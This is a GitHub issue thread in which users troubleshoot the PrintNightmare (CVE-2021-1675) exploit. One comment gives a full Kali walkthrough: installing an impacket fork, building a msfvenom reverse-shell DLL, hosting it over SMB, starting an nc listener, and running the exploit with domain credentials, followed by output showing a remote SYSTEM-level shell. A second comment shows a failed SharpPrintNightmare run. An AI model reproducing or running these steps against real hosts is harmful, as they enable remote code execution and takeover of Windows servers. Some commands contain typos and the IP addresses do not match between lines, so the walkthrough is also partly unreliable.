CustosClarus
commented
1 year ago it will solve for you if you use the domain user account not the admin
Open useragent23253 opened 1 year ago
CustosClarus
commented
1 year ago it will solve for you if you use the domain user account not the admin
MiMaz7707
commented
4 months ago Hello,
The exploit will not work if you use a privileged user, the user must be a simple domain user.
Steps from a kali machine :
1- remove preinstalled impacket package
# arp remove --purge python3-impkacket
or
# pip3 uninstall impacket
2- install the impacket package from cube0x0 repo
# git clone https://github.com/cube0x0/impacket
# cd impacket
# python3 ./setup.py install
3- create a dll payload
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.117.200 LPORT=9090 -f dll -o print64.dll
4- put the payload on shared folder and run smbserver.py or smbd service
# cp print64.dll /share/
# smbserver.py share /share -smb2support
/usr/local/bin/smbserver.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'smbserver.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
5- run nc for listening
# nc -lvp 9090
listening on [any] 9090 ...
6- run the exploit with a simple domain user, will generate some errors but it will work
# python3 CVE-2021-1675.py mylab.local/user:'user@koko123'@192.168.117.10 '\\192.168.117.200\share\print64.dll'
[*] Connecting to ncacn_np:192.168.117.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3d8f0626c408afea\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.80.41\share\print64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smbconnection.py", line 568, in writeFile
return self._SMBConnection.writeFile(treeId, fileId, data, offset)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smb3.py", line 1650, in writeFile
written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
7- here is my shell :D
nc -lvp 9090
listening on [any] 9090 ...
connect to [192.168.117.200] from SRV-EX01.mylab.local [192.168.117.10] 52823
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
hostname
SRV01
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::4980:feb4:6fae:992d%6
IPv4 Address. . . . . . . . . . . : 192.168.117.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.117.254
Tunnel adapter isatap.{EC174390-CEE5-4891-85B5-536D188BC65E}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
it works fine with impacket 0.11.0 too
I was testing with custom dll that create local admin user and with msfvenom shellcode. Both samples aren't working. Any suggestion?
c:\Users\user1\Downloads>SharpPrintNightmare.exe 'c:\programdata\5001.dll' [] pDriverPath C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\mxdwdrv.dll [] Executing 'c:\programdata\5001.dll' [] Try 1... [] Stage 0: 87 [] Try 2... [] Stage 0: 87 [] Try 3... [] Stage 0: 87